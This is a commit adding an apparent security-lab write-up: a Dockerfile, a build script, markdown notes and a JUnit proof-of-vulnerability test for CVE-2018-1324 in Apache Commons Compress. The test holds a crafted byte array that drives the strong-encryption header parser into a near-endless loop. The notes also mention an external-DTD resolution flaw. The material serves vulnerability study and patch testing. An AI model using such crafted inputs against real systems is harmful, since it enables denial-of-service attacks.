Added lab 4 writeup (WIP)
This commit is contained in:
Michael Chen
4
Exercise/Writeup/Lab 04/Dockerfile
Normal file
4
Exercise/Writeup/Lab 04/Dockerfile
Normal file
@@ -0,0 +1,4 @@
|
|||||||
|
FROM bqcuongas/sselab:latest
|
||||||
|
|
||||||
|
# Copy Task 3 Tests to Image
|
||||||
|
COPY RCountLoopTest.java /SSE_LAB/CVE-2018-1324/src/test/java/org/apache/commons/compress/archivers/zip/
|
||||||
23
Exercise/Writeup/Lab 04/RCountLoopTest.java
Normal file
23
Exercise/Writeup/Lab 04/RCountLoopTest.java
Normal file
@@ -0,0 +1,23 @@
|
|||||||
|
package org.apache.commons.compress.archivers.zip;
|
||||||
|
import org.junit.Test;
|
||||||
|
|
||||||
|
public class RCountLoopTest {
|
||||||
|
@Test(timeout = 5000)
|
||||||
|
public void rCountLoopPoVTest() {
|
||||||
|
X0017_StrongEncryptionHeader header = new X0017_StrongEncryptionHeader();
|
||||||
|
byte[] data = {
|
||||||
|
/* [0] Format */ 0,0,
|
||||||
|
/* [2] Algorithm */ 0,0,
|
||||||
|
/* [4] Bitlen */ 0,0,
|
||||||
|
/* [6] Flags */ 0,0,
|
||||||
|
/* [8] RCount (Outer Loop) */ -1,-1,-1,-1,
|
||||||
|
/* [12] HashType */ 0,0,
|
||||||
|
/* [14] HashSize (inner loop) */ -1,-1
|
||||||
|
};
|
||||||
|
int offset = 0;
|
||||||
|
int length = 0;
|
||||||
|
// System.err.println(String.format("ZIP RCount is '%d'!", ZipLong.getValue(data, 8)));
|
||||||
|
// System.err.println(String.format("ZIP HashSize is '%d'!", ZipShort.getValue(data, 14)));
|
||||||
|
header.parseCentralDirectoryFormat(data, offset, length);
|
||||||
|
}
|
||||||
|
}
|
||||||
2
Exercise/Writeup/Lab 04/build.sh
Normal file
2
Exercise/Writeup/Lab 04/build.sh
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
#!/bin/sh -e
|
||||||
|
docker build -f Dockerfile -t hub.cnml.de/sselab:latest .
|
||||||
32
Exercise/Writeup/lab04.md
Normal file
32
Exercise/Writeup/lab04.md
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
# Lab 4
|
||||||
|
|
||||||
|
## Task 2
|
||||||
|
|
||||||
|
The test that reveals the vulnerability is.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Run the newly created PoV
|
||||||
|
$ mvn test -e -Dtest=SupportDTDDefaultsTest#testDTDAttempt
|
||||||
|
SupportDTDDefaultsTest.testDTDAttempt:20 Should not try to resolve external DTD subset: java.io.IOException: java.net.ConnectException: Connection refused (Connection refused)
|
||||||
|
```
|
||||||
|
|
||||||
|
After introducing the patch the PoV disappeared.
|
||||||
|
|
||||||
|
## Task 3
|
||||||
|
|
||||||
|
For this vulnerability we added additonal test that acts as a PoV to the docker image.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Run all tests
|
||||||
|
$ mvn test
|
||||||
|
|
||||||
|
# Run only the newly created PoV
|
||||||
|
$ mvn test -e -Dtest=RCountLoopBug#rCountLoopPoVTest
|
||||||
|
RCountLoopTest.rCountLoopPoVTest:21 » TestTimedOut test timed out after 5000 m...
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Re-apply patch (revert patch is staged)
|
||||||
|
$ git restore --staged src/
|
||||||
|
$ git restore src/
|
||||||
|
```
|
||||||
Reference in New Issue
Block a user